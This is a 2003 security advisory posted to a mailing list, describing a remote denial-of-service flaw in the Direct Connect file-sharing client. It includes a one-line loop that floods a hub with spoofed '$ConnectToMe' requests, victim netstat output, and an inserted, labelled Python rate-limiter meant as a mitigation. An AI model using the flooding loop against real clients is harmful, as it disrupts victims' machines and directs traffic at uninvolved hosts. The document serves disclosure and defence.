Message-ID: <20030714133719.271ce174.noreply@sec-labs.hack.pl>
From: noreply at sec-labs.hack.pl (sec-labs team)
Subject: [sec-labs] Remote Denial of Service vulnerability in NeoModus
Direct Connect 1.0 build 9
sec-labs team proudly presents:
Remote DoS vulnerability in NeoModus Direct Connect 1.0 build 9
and probably the newest version as well.
by Lord YuP
13/07/2003
I. BACKGROUND
Direct Connect is a Windows p2p file-sharing program (I've also found a Linux
version but I don't have time to test it), quite common nowadays.
II. DESCRIPTION
According to aDe, the DC client-to-client handshake looks like this:
Client <-> Client Communication in DC. 11-05-2002. By aDe
----------------------------------------------------------
ACTIVE FILE DOWNLOAD
----------------------
D = downloader
U = uploader
H = hub
D>H: $ConnectToMe <U's username> <D's IP and port>|
H>U: $ConnectToMe <U's username> <D's IP and port>|
...bla bla ... ;)
As you can guess, after receiving the "$ConnectToMe ..." command from the hub,
the Direct Connect client tries to connect to the specific IP and port sent
by the downloader.
The attacker (evil downloader) can send an unlimited number of requests to
the hub with an ip:port of his choosing, causing a DoS attack on the
victim's client.
Little example:
Attacker: for (;;) { dc_send("$ConnectToMe victim www.microsoft.com:%d",sample_port++); }
Victim client (output of "netstat -a"):
TCP jin:1993 JIN:0 LISTENING
TCP jin:1995 JIN:0 LISTENING
TCP jin:1996 JIN:0 LISTENING
TCP jin:2005 JIN:0 LISTENING
TCP jin:2006 JIN:0 LISTENING
TCP jin:2007 JIN:0 LISTENING
TCP jin:2008 JIN:0 LISTENING
TCP jin:2009 JIN:0 LISTENING
TCP jin:2010 JIN:0 LISTENING
TCP jin:2011 JIN:0 LISTENING
TCP jin:2012 JIN:0 LISTENING
TCP jin:2013 JIN:0 LISTENING
TCP jin:2014 JIN:0 LISTENING
TCP jin:2015 JIN:0 LISTENING
TCP jin:2016 JIN:0 LISTENING
TCP jin:2017 JIN:0 LISTENING
TCP jin:2018 JIN:0 LISTENING
TCP jin:2019 JIN:0 LISTENING
...and so on...
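A client-side mitigation for the flood described above, written as an added example (it is not code from NeoModus or from the advisory): it parses incoming commands in the "$ConnectToMe <user> <ip>:<port>|" format quoted earlier and drops requests beyond an assumed per-window rate and pending-connection cap, so a hub relaying an unbounded loop of requests can no longer open an unbounded number of sockets on the victim. The limits, the 192.0.2.10 address and the 10 ms spacing are constructed values.

```python
import re
from collections import deque

# Wire format quoted in the advisory: "$ConnectToMe <user> <ip>:<port>|"
CONNECT_TO_ME = re.compile(r"^\$ConnectToMe (\S+) (\S+):(\d{1,5})$")

class ConnectToMeLimiter:
    """Accept at most max_requests $ConnectToMe commands per window seconds and
    keep at most max_pending distinct ip:port targets in flight; everything
    beyond that is dropped before it can become a socket (limits are assumed)."""

    def __init__(self, max_requests=5, window=10.0, max_pending=20):
        self.max_requests, self.window, self.max_pending = max_requests, window, max_pending
        self.recent = deque()   # timestamps of accepted requests inside the window
        self.pending = set()    # (ip, port) targets we are still trying to reach

    def handle(self, command, now):
        """Classify one hub command; returns ('connect', target) or ('drop', reason)."""
        m = CONNECT_TO_ME.match(command.rstrip("|"))
        if not m:
            return ("drop", "malformed")
        ip, port = m.group(2), int(m.group(3))
        if not 0 < port < 65536:
            return ("drop", "bad-port")
        while self.recent and now - self.recent[0] >= self.window:
            self.recent.popleft()          # slide the window forward
        if (ip, port) in self.pending:
            return ("drop", "duplicate")
        if len(self.recent) >= self.max_requests:
            return ("drop", "rate-limit")
        if len(self.pending) >= self.max_pending:
            return ("drop", "too-many-pending")
        self.recent.append(now)
        self.pending.add((ip, port))
        return ("connect", f"{ip}:{port}")

    def finished(self, ip, port):
        """Call when the outbound attempt succeeded or failed."""
        self.pending.discard((ip, port))

def simulate_flood(count, step=0.01):
    """Constructed sample: count commands 10 ms apart with incrementing ports,
    mirroring the advisory's loop. Returns (connects, drops)."""
    lim = ConnectToMeLimiter()
    actions = [lim.handle(f"$ConnectToMe victim 192.0.2.10:{1993 + i}|", i * step)[0]
               for i in range(count)]
    return actions.count("connect"), actions.count("drop")

if __name__ == "__main__":
    print(simulate_flood(100))  # → (5, 95)
```

With the constructed limits, 100 flooded requests within one second yield only 5 connection attempts; a client counting connections this way would also have an obvious signal to log or to warn the user about a misbehaving hub.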
III. IMPACT
The attacked client may be DoS-ed: its internet connection can be
reset or stopped, some clients may be flooded with "Out of Memory"
message boxes, the system may stop working correctly, and the DC
client may be terminated.
--
sec-labs team [http://sec-labs.hack.pl]